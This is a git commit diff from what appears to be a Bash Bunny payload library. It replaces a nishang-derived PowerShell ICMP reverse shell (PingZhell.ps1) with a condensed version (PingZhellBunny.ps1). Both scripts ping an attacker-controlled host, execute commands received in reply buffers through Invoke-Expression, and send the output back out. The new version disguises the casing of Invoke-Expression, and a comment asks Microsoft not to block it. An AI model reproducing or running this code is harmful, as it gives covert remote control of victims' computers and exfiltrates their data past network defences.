Update and rename PingZhell.ps1 to PingZhellBunny.ps1

payloads/library/remote_access/PingZhellBunny/PingZhell.ps1

@@ -1,86 +0,0 @@
-
-<#
-
-Original script by nishang - modified by 0iphor13 for PingZhell
-
-Use bunny.pl as a master
-
-When running the master, don't forget to disable ICMP replies by the OS. For example:
-$: sysctl -w net.ipv4.icmp_echo_ignore_all=1
-Then:
-$: perl bunny.pl
-
-Microsoft please don't block, oh dear microsoft corporation
-#>           
-   
-
-    $IPAddress = 'Attacker-IP'
-    $Delay = 5
-    $BufferSize = 128
-
-    #Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
-    $ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
-    $PingOptions = New-Object System.Net.NetworkInformation.PingOptions
-    $PingOptions.DontFragment = $True
-    $MicrosoftCopyright =@"
- _______ ___ __    _ _______ _______ __   __ _______ ___     ___     
-|       |   |  |  | |       |       |  | |  |       |   |   |   |    
-|    _  |   |   |_| |    ___|____   |  |_|  |    ___|   |   |   |    
-|   |_| |   |       |   | __ ____|  |       |   |___|   |   |   |    
-|    ___|   |  _    |   ||  | ______|       |    ___|   |___|   |___ 
-|   |   |   | | |   |   |_| | |_____|   _   |   |___|       |       |
-|___|   |___|_|  |__|_______|_______|__| |__|_______|_______|_______|                       
-
-
-Windows PowerShell running as user $env:username on $env:computername `n
-"@;
-
-    # Copyright Copies Right
-    $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
-    $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
-
-    #Does a german penguin just PingUin?
-    $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
-    $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
-
-    while ($true)
-    {
-        $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
-        $reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)
-        
-        if ($reply.Buffer)
-        {
-            $response = ([text.encoding]::ASCII).GetString($reply.Buffer)
-            $result = (Invoke-Expression -Command $response 2>&1 | Out-String )
-            $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
-            $index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
-            $i = 0
-
-            #Fragmant larger output into smaller ones to send to the server.
-            if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
-            {
-                while ($i -lt $index )
-                {
-                    $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
-                    $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
-                    $i +=1
-                }
-                $remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
-                if ($remainingindex -ne 0)
-                {
-                    $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
-                    $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
-                }
-            }
-            else
-            {
-                $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
-            }
-            $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
-            $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
-        }
-        else
-        {
-            Start-Sleep -Seconds $Delay
-        }
-    }

payloads/library/remote_access/PingZhellBunny/PingZhellBunny.ps1

@@ -0,0 +1,10 @@
+$Delay=5;
+$BufferSize=128;
+$ICMPBunny=New-Object System.Net.NetworkInformation.Ping;
+$PingBB=New-Object System.Net.NetworkInformation.PingOptions;
+$PingBB.DontFragment = $True;$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('Bunny@PS '+(gl).Path+'> ');
+$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null;while ($true){$NeverGonnaGiveYouUp=([text.encoding]::ASCII).GetBytes('');
+$reply=$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);
+$result=(Invoke-eXprEssIon -Command $response 2>&1 | Out-String );$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($NeverGonnaGiveYouUp.length/$BufferSize);$i = 0;if($NeverGonnaGiveYouUp.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null;$i +=1;};
+$remainingindex=$NeverGonnaGiveYouUp.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null}}else{$ICMPBunny.Send($IP,60 * 10000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null};$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nO.MG@PS " + (pwd).Path + '> ');
+$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null}else{Start-Sleep -Seconds $Delay}}